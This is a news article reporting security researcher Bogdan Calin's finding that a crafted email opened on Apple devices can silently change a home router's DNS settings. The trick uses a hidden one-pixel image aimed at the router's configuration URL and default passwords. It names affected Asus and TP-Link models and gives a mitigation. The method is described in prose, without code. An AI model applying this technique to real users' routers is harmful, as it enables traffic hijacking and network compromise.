Security researcher Bogdan Calin found that he could remotely compromise the internal networks of users with default or weak router passwords merely by compelling them to open a legitimate looking email on their iPhone, iPad, or Mac.
Writing for the Acunetix blog, Calin explains that he has found a way to specially craft emails in such a way that once opened he can compromise that user’s internal network and change the DNS servers generally used by the router to an IP address under his or an attacker’s control.
The attack leverages two unrelated instances of insecurity. The first is a functionality in Apple products that loads images from remote servers by default in emails. The other vulnerability is the reality that most Internet users are either completely unaware that they can change their default router password, know they can but choose not to change it anyway, or change it to a weak password. Of course, once you enter a router’s settings interface you can make all sorts of changes.
So what? How is email image loading connected to router configurations? Well, Calin realized that the router models he tested in his attack accepted configuration parameters through POST and GET requests. He exploited this by changing the POST parameters to GET parameters and sending off an email in which he embedded an invisible, one by one pixel image of the router’s configuration URL in the background of an email, concealed by a video or some other image, which would then be automatically uploaded. He increased the chances of his attack succeeding by hiding a number of iframes in the invisible image with default and commonly used username-password combinations.
When the victim opens the email, they don’t need to click anything for the exploit to work. Just opening the email changes the victim’s router’s DNS servers to an IP address of Calin’s choosing.
Calin successfully tested the attack on his Asus RT-N16 and N56U routers and later updated his report to reflect that the attack seemed to be working against TP-Link routers as well, specifically the TL-WR841N model, but he writes that it is possible that the attack could work against other makes and models as well, particularly those that accept configuration changes from GET parameters and don’t have built in cross-site request forgery protections.
Users can mitigate against this attack altogether by altering their settings so that images aren’t automatically uploaded when users open an email, which, as Calin notes, is the recommended best-practice by most security experts anyway.